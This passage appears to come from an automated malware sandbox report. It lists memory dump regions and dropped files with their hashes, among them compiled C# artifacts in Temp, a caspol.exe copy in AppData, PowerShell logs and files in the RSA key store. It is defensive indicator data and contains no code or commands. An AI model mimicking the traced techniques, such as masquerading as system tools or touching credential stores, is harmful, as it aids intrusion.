memory/1488-46-0x0000000007CE0000-0x0000000007CF1000-memory.dmp
memory/1488-47-0x0000000007D10000-0x0000000007D1E000-memory.dmp
memory/1488-48-0x0000000007D20000-0x0000000007D34000-memory.dmp
memory/1488-49-0x0000000007E30000-0x0000000007E4A000-memory.dmp
memory/1488-50-0x0000000007D60000-0x0000000007D68000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\qvxa3jwg\qvxa3jwg.cmdline
| MD5 | b028c52901cfe4669c90a423ca8f09c5 |
| SHA1 | 3e7df7cc8ee7d97eb79d65564f4608e5f666103a |
| SHA256 | 19020d492a53086bd94faba09d53cb4b185ed9fe446d571f7513a0db5380bb42 |
| SHA512 | 624bd1dc71314f5fab1e50f9ed6bd25b8bfe81e27029f65414fbdc6a1573ce42124fd24e90f52403f30b72ecf54ee969a1ebd4768919863b2414676f21e30a4e |
\??\c:\Users\Admin\AppData\Local\Temp\qvxa3jwg\qvxa3jwg.0.cs
| MD5 | f97fc8141f59078b4354b513d3b083ac |
| SHA1 | 293904ab8d5f38a2f0764ee2e35e97e590d8c737 |
| SHA256 | f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e |
| SHA512 | 87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c |
\??\c:\Users\Admin\AppData\Local\Temp\qvxa3jwg\CSC21F546F2CC29440ABFE9B5BCAF7FEEC9.TMP
| MD5 | 400b6bb59408a91f4dff4ce616c1c88b |
| SHA1 | 5c0cd03c6afb814289757e450d26752def0c4706 |
| SHA256 | 977b1e476ce2aa2bbe4434cfe2c0be3060fba012421fccb4d7e3c96a3f9ecd6b |
| SHA512 | a89e7e5b014f053debb538298e0945ddb37531ad22f1848261cfab65f9793118fce0ca45f3b5e9114ac5069378d3605adeffbeb62ead8e39007d874bffcdf12d |
C:\Users\Admin\AppData\Local\Temp\RESC1F8.tmp
| MD5 | 3e69cc8602c6c85ca6b6b1d8e06dd0a0 |
| SHA1 | 861ab2d159be0bb670e4eaba23c65e6cb23e5542 |
| SHA256 | 7684797c6697be2d7771fbeb1398fe8c0b452ef4ab49dad3e6325d52fab6b98f |
| SHA512 | 82e6b52cafa3d5e64707d5fd34bcf4e62fba11ab10a17b72adb9eb28153e312ab84ad4f43145969c32344ab664da704d8589fd3d0dd5915afcaac24b74a28339 |
C:\Users\Admin\AppData\Local\Temp\qvxa3jwg\qvxa3jwg.dll
| MD5 | 660d42aac5531bde942fb726ae3167ba |
| SHA1 | 257b344999c7c8a44dd9c5dfd2146c5674a6ae10 |
| SHA256 | 5b0f1c89a90eb1d54f25e5dbd6fd00cabbd38f8c5a9de18e6a0d48ee6050dc63 |
| SHA512 | b53ca04ad5dc78ba0795e243a6235fc248039c1719bcfc76b981083b35a537295b6baa8b266a587034ee9f5cd788adcd148d462ba865f39b68c33dd83299df49 |
memory/1448-65-0x0000000006DF0000-0x0000000006DF8000-memory.dmp
memory/1448-67-0x000000007136E000-0x000000007136F000-memory.dmp
memory/1448-68-0x0000000071360000-0x0000000071B10000-memory.dmp
memory/1448-73-0x0000000071360000-0x0000000071B10000-memory.dmp
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 80358303e33cef71434e6e4a621262c5 |
| SHA1 | e7a22b4e5af741f9b4d9982f36164b276bba459a |
| SHA256 | f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7 |
| SHA512 | 5e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWERSHELl.exE.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b1156d890fc7c5e6b43b75df820f9a0e |
| SHA1 | d1ea45d1465bd835be028cd095de2626a261353d |
| SHA256 | 1e38fe6e5b2357e84e7adb487de1bd1160f1718733abbbbaf44079bdcf188cc4 |
| SHA512 | 93732d49d21d7064595b438c0f1a80c842985f33d64a904f6f5737cd5143dbd81428e355d6d35bd57704cbf1e87a324f0875d1570ee7e8afe6b0061ca1d704a9 |
memory/3180-82-0x0000000000670000-0x0000000000704000-memory.dmp
memory/3180-83-0x0000000005550000-0x0000000005AF4000-memory.dmp
memory/1448-84-0x0000000071360000-0x0000000071B10000-memory.dmp
memory/3180-85-0x0000000005040000-0x00000000050D2000-memory.dmp
memory/3180-86-0x0000000005190000-0x000000000523A000-memory.dmp
memory/3180-87-0x0000000005170000-0x000000000517A000-memory.dmp
memory/3180-88-0x0000000005F20000-0x0000000005FBC000-memory.dmp
memory/3180-89-0x0000000005F00000-0x0000000005F12000-memory.dmp
memory/3180-90-0x00000000071B0000-0x0000000007214000-memory.dmp
memory/1196-91-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1196-94-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/3248-104-0x0000000006030000-0x0000000006384000-memory.dmp
memory/3248-106-0x0000000006970000-0x00000000069BC000-memory.dmp
memory/3248-110-0x000000006DBE0000-0x000000006DC2C000-memory.dmp
memory/3248-120-0x00000000075F0000-0x0000000007693000-memory.dmp
memory/3248-121-0x0000000007B30000-0x0000000007B41000-memory.dmp
memory/3248-122-0x0000000007B70000-0x0000000007B84000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |